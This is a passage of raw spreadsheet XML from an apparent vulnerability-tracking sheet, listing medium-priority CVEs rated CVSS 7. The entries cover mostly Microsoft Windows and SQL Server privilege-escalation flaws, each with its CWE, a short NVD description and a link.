r="S1451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t></is></c></row><row r="1452"><c r="A1452" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1452" s="5" t="inlineStr"><is><t>CVE-2026-70578</t></is></c><c r="D1452" s="5" t="n"><v>7</v></c><c r="E1452" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1452" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1452" s="5" t="inlineStr" /><c r="H1452" s="5" t="n"><v>0.003</v></c><c r="I1452" s="5" t="inlineStr" /><c r="J1452" s="5" t="inlineStr" /><c r="K1452" s="5" t="inlineStr" /><c r="L1452" s="5" t="inlineStr" /><c r="M1452" s="5" t="inlineStr" /><c r="N1452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1452" s="5" t="inlineStr" /><c r="Q1452" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1452" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t></is></c></row><row r="1453"><c r="A1453" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1453" s="5" t="inlineStr"><is><t>CVE-2026-70585</t></is></c><c r="D1453" s="5" t="n"><v>7</v></c><c r="E1453" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1453" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1453" s="5" t="inlineStr" /><c r="H1453" s="5" t="n"><v>0.003</v></c><c r="I1453" s="5" t="inlineStr" /><c r="J1453" s="5" t="inlineStr" /><c r="K1453" s="5" t="inlineStr" /><c r="L1453" s="5" t="inlineStr" /><c r="M1453" s="5" t="inlineStr" /><c r="N1453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1453" s="5" t="inlineStr" /><c r="Q1453" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1453" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t></is></c><c r="S1453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t></is></c></row><row r="1454"><c r="A1454" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1454" s="5" t="inlineStr"><is><t>CVE-2026-71332</t></is></c><c r="D1454" s="5" t="n"><v>7</v></c><c r="E1454" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1454" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1454" s="5" t="inlineStr" /><c r="H1454" s="5" t="n"><v>0.003</v></c><c r="I1454" s="5" t="inlineStr" /><c r="J1454" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K145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54" s="5" t="inlineStr" /><c r="M1454" s="5" t="inlineStr" /><c r="N1454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1454" s="5" t="inlineStr" /><c r="Q1454" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1454" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t></is></c></row><row r="1455"><c r="A1455" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1455" s="5" t="inlineStr"><is><t>CVE-2026-71333</t></is></c><c r="D1455" s="5" t="n"><v>7</v></c><c r="E1455" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1455" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1455" s="5" t="inlineStr" /><c r="H1455" s="5" t="n"><v>0.003</v></c><c r="I1455" s="5" t="inlineStr" /><c r="J1455" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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5" s="5" t="inlineStr" /><c r="M1455" s="5" t="inlineStr" /><c r="N1455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1455" s="5" t="inlineStr" /><c r="Q1455" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1455" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t></is></c></row><row r="1456"><c r="A1456" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1456" s="5" t="inlineStr"><is><t>CVE-2026-71340</t></is></c><c r="D1456" s="5" t="n"><v>7</v></c><c r="E1456" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1456" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1456" s="5" t="inlineStr" /><c r="H1456" s="5" t="n"><v>0.003</v></c><c r="I1456" s="5" t="inlineStr" /><c r="J1456" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1456"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56" s="5" t="inlineStr" /><c r="M1456" s="5" t="inlineStr" /><c r="N1456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1456" s="5" t="inlineStr" /><c r="Q1456" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1456" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t></is></c></row><row r="1457"><c r="A1457" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1457" s="5" t="inlineStr"><is><t>CVE-2026-71342</t></is></c><c r="D1457" s="5" t="n"><v>7</v></c><c r="E1457" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1457" s="5" t="inlineStr" /><c r="H1457" s="5" t="n"><v>0.002</v></c><c r="I1457" s="5" t="inlineStr" /><c r="J1457" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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57" s="5" t="inlineStr" /><c r="M1457" s="5" t="inlineStr" /><c r="N1457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1457" s="5" t="inlineStr" /><c r="Q1457" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1457" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t></is></c></row><row r="1458"><c r="A1458" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1458" s="5" t="inlineStr"><is><t>CVE-2026-71351</t></is></c><c r="D1458" s="5" t="n"><v>7</v></c><c r="E1458" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1458" s="5" t="inlineStr" /><c r="H1458" s="5" t="n"><v>0.003</v></c><c r="I1458" s="5" t="inlineStr" /><c r="J1458" s="5" t="inlineStr" /><c r="K1458" s="5" t="inlineStr" /><c r="L1458" s="5" t="inlineStr" /><c r="M1458" s="5" t="inlineStr" /><c r="N1458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1458" s="5" t="inlineStr" /><c r="Q1458" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1458" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t></is></c></row><row r="1459"><c r="A1459" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1459" s="5" t="inlineStr"><is><t>CVE-2026-71353</t></is></c><c r="D1459" s="5" t="n"><v>7</v></c><c r="E1459" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1459" s="5" t="inlineStr" /><c r="H1459" s="5" t="n"><v>0.002</v></c><c r="I1459" s="5" t="inlineStr" /><c r="J1459" s="5" t="inlineStr" /><c r="K1459" s="5" t="inlineStr" /><c r="L1459" s="5" t="inlineStr" /><c r="M1459" s="5" t="inlineStr" /><c r="N1459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1459" s="5" t="inlineStr" /><c r="Q1459" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1459" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t></is></c></row><row r="1460"><c r="A1460" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1460" s="5" t="inlineStr"><is><t>CVE-2026-72926</t></is></c><c r="D1460" s="5" t="n"><v>7</v></c><c r="E1460" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1460" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1460" s="5" t="inlineStr" /><c r="H1460" s="5" t="n"><v>0.003</v></c><c r="I1460" s="5" t="inlineStr" /><c r="J1460" s="5" t="inlineStr" /><c r="K1460" s="5" t="inlineStr" /><c r="L1460" s="5" t="inlineStr" /><c r="M1460" s="5" t="inlineStr" /><c r="N1460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1460" s="5" t="inlineStr" /><c r="Q1460" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1460" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t></is></c></row><row r="1461"><c r="A1461" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1461" s="5" t="inlineStr"><is><t>CVE-2026-72930</t></is></c><c r="D1461" s="5" t="n"><v>7</v></c><c r="E1461" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1461" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1461" s="5" t="inlineStr" /><c r="H1461" s="5" t="n"><v>0.003</v></c><c r="I1461" s="5" t="inlineStr" /><c r="J1461" s="5" t="inlineStr" /><c r="K1461" s="5" t="inlineStr" /><c r="L1461" s="5" t="inlineStr" /><c r="M1461" s="5" t="inlineStr" /><c r="N1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1461" s="5" t="inlineStr" /><c r="Q1461" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1461" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t></is></c><c r="S1461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t></is></c></row><row r="1462"><c r="A1462" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1462" s="5" t="inlineStr"><is><t>CVE-2026-72952</t></is></c><c r="D1462" s="5" t="n"><v>7</v></c><c r="E1462" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1462" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1462" s="5" t="inlineStr" /><c r="H1462" s="5" t="n"><v>0.003</v></c><c r="I1462" s="5" t="inlineStr" /><c r="J1462" s="5" t="inlineStr" /><c r="K1462" s="5" t="inlineStr" /><c r="L1462" s="5" t="inlineStr" /><c r="M1462" s="5" t="inlineStr" /><c r="N1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1462" s="5" t="inlineStr" /><c r="Q1462" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1462" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="S1462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t></is></c></row><row r="1463"><c r="A1463" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1463" s="5" t="inlineStr"><is><t>CVE-2026-72963</t></is></c><c r="D1463" s="5" t="n"><v>7</v></c><c r="E1463" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1463" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1463" s="5" t="inlineStr" /><c r="H1463" s="5" t="n"><v>0.003</v></c><c r="I1463" s="5" t="inlineStr" /><c r="J1463" s="5" t="inlineStr" /><c r="K1463" s="5" t="inlineStr" /><c r="L1463" s="5" t="inlineStr" /><c r="M1463" s="5" t="inlineStr" /><c r="N1463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1463" s="5" t="inlineStr" /><c r="Q1463" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1463" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t></is></c></row><row r="1464"><c r="A1464" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1464" s="5" t="inlineStr"><is><t>CVE-2026-73003</t></is></c><c r="D1464" s="5" t="n"><v>7</v></c><c r="E1464" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1464" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1464" s="5" t="inlineStr" /><c r="H1464" s="5" t="n"><v>0.002</v></c><c r="I1464" s="5" t="inlineStr" /><c r="J1464" s="5" t="inlineStr" /><c r="K1464" s="5" t="inlineStr" /><c r="L1464" s="5" t="inlineStr" /><c r="M1464" s="5" t="inlineStr" /><c r="N1464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1464" s="5" t="inlineStr" /><c r="Q1464" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1464" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t></is></c></row><row r="1465"><c r="A1465" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1465" s="5" t="inlineStr"><is><t>CVE-2026-73005</t></is></c><c r="D1465" s="5" t="n"><v>7</v></c><c r="E1465" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1465" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1465" s="5" t="inlineStr" /><c r="H1465" s="5" t="n"><v>0.002</v></c><c r="I1465" s="5" t="inlineStr" /><c r="J1465" s="5" t="inlineStr" /><c r="K1465" s="5" t="inlineStr" /><c r="L1465" s="5" t="inlineStr" /><c r="M1465" s="5" t="inlineStr" /><c r="N1465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1465" s="5" t="inlineStr" /><c r="Q1465" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1465" s="5" t="inlineStr"><is><t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t></is></c></row><row r="1466"><c r="A1466" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1466" s="5" t="inlineStr"><is><t>CVE-2026-73022</t></is></c><c r="D1466" s="5" t="n"><v>7</v></c><c r="E1466" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1466" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1466" s="5" t="inlineStr" /><c r="H1466" s="5" t="n"><v>0.002</v></c><c r="I1466" s="5" t="inlineStr" /><c r="J1466" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1466"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466" s="5" t="inlineStr" /><c r="M1466" s="5" t="inlineStr" /><c r="N1466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1466" s="5" t="inlineStr" /><c r="Q1466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1466" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t></is></c></row><row r="1467"><c r="A1467" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1467" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1467" s="5" t="inlineStr"><is><t>CVE-2026-74236</t></is></c><c r="D1467" s="5" t="n"><v>7</v></c><c r="E1467" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1467" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1467" s="5" t="inlineStr" /><c r="H1467" s="5" t="n"><v>0.006</v></c><c r="I1467" s="5" t="inlineStr" /><c r="J1467" s="5" t="inlineStr" /><c r="K1467" s="5" t="inlineStr" /><c r="L1467" s="5" t="inlineStr" /><c r="M1467" s="5" t="inlineStr" /><c r="N1467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1467" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1467" s="5" t="inlineStr" /><c r="Q1467" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1467" s="5" t="inlineStr"><is><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is></c><c r="S1467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74236</t></is></c></row><row r="1468"><c r="A1468" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1468" s="5" t="inlineStr"><is><t>CVE-2026-77485</t></is></c><c r="D1468" s="5" t="n"><v>7</v></c><c r="E1468" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1468" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1468" s="5" t="inlineStr" /><c r="H1468" s="5" t="n"><v>0.002</v></c><c r="I1468" s="5" t="inlineStr" /><c r="J1468" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1468" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1468" s="5" t="inlineStr" /><c r="M1468" s="5" t="inlineStr" /><c r="N1468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1468" s="5" t="inlineStr" /><c r="Q1468" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1468" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t></is></c></row><row r="1469"><c r="A1469" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1469" s="5" t="inlineStr"><is><t>CVE-2026-77894</t></is></c><c r="D1469" s="5" t="n"><v>7</v></c><c r="E1469" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1469" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1469" s="5" t="inlineStr" /><c r="H1469" s="5" t="n"><v>0.002</v></c><c r="I1469" s="5" t="inlineStr" /><c r="J1469" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K146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69" s="5" t="inlineStr" /><c r="M1469" s="5" t="inlineStr" /><c r="N1469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1469" s="5" t="inlineStr" /><c r="Q1469" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1469" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t></is></c></row><row r="1470"><c r="A1470" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1470" s="5" t="inlineStr"><is><t>CVE-2026-77897</t></is></c><c r="D1470" s="5" t="n"><v>7</v></c><c r="E1470" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1470" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1470" s="5" t="inlineStr" /><c r="H1470" s="5" t="n"><v>0.003</v></c><c r="I1470" s="5" t="inlineStr" /><c r="J1470" s="5" t="inlineStr" /><c r="K1470" s="5" t="inlineStr" /><c r="L1470" s="5" t="inlineStr" /><c r="M1470" s="5" t="inlineStr" /><c r="N1470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1470" s="5" t="inlineStr" /><c r="Q1470" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="R1470" s="5" t="inlineStr"><is><t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t></is></c></row><row r="1471"><c r="A1471" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1471" s="5" t="inlineStr"><is><t>CVE-2026-77899</t></is></c><c r="D1471" s="5" t="n"><v>7</v></c><c r="E1471" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1471" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1471" s="5" t="inlineStr" /><c r="H1471" s="5" t="n"><v>0.002</v></c><c r="I1471" s="5" t="inlineStr" /><c r="J1471" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1471" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t></is></c><c r="L1471" s="5" t="inlineStr" /><c r="M1471" s="5" t="inlineStr" /><c r="N1471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1471" s="5" t="inlineStr" /><c r="Q1471" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1471" s="5" t="inlineStr"><is><t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t></is></c></row><row r="1472"><c r="A1472" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1472" s="5" t="inlineStr"><is><t>CVE-2026-77905</t></is></c><c r="D1472" s="5" t="n"><v>7</v></c><c r="E1472" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1472" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1472" s="5" t="inlineStr" /><c r="H1472" s="5" t="n"><v>0.002</v></c><c r="I1472" s="5" t="inlineStr" /><c r="J1472" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K147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72" s="5" t="inlineStr" /><c r="M1472" s="5" t="inlineStr" /><c r="N1472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1472" s="5" t="inlineStr" /><c r="Q1472" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1472" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t></is></c></row><row r="1473"><c r="A1473" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1473" s="5" t="inlineStr"><is><t>CVE-2026-78457</t></is></c><c r="D1473" s="5" t="n"><v>7</v></c><c r="E1473" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1473" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1473" s="5" t="inlineStr" /><c r="H1473" s="5" t="n"><v>0.002</v></c><c r="I1473" s="5" t="inlineStr" /><c r="J1473" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1473" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1473" s="5" t="inlineStr" /><c r="M1473" s="5" t="inlineStr" /><c r="N1473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1473" s="5" t="inlineStr" /><c r="Q1473" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1473" s="5" t="inlineStr"><is><t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t></is></c></row><row r="1474"><c r="A1474" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1474" s="5" t="inlineStr"><is><t>CVE-2026-78464</t></is></c><c r="D1474" s="5" t="n"><v>7</v></c><c r="E1474" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1474" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1474" s="5" t="inlineStr" /><c r="H1474" s="5" t="n"><v>0.002</v></c><c r="I1474" s="5" t="inlineStr" /><c r="J1474" s="5" t="inlineStr" /><c r="K1474" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1474" s="5" t="inlineStr" /><c r="M1474" s="5" t="inlineStr" /><c r="N1474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1474" s="5" t="inlineStr" /><c r="Q1474" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1474" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="S1474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t></is></c></row><row r="1475"><c r="A1475" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1475" s="5" t="inlineStr"><is><t>CVE-2026-80093</t></is></c><c r="D1475" s="5" t="n"><v>7</v></c><c r="E1475" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1475" s="5" t="inlineStr" /><c r="H1475" s="5" 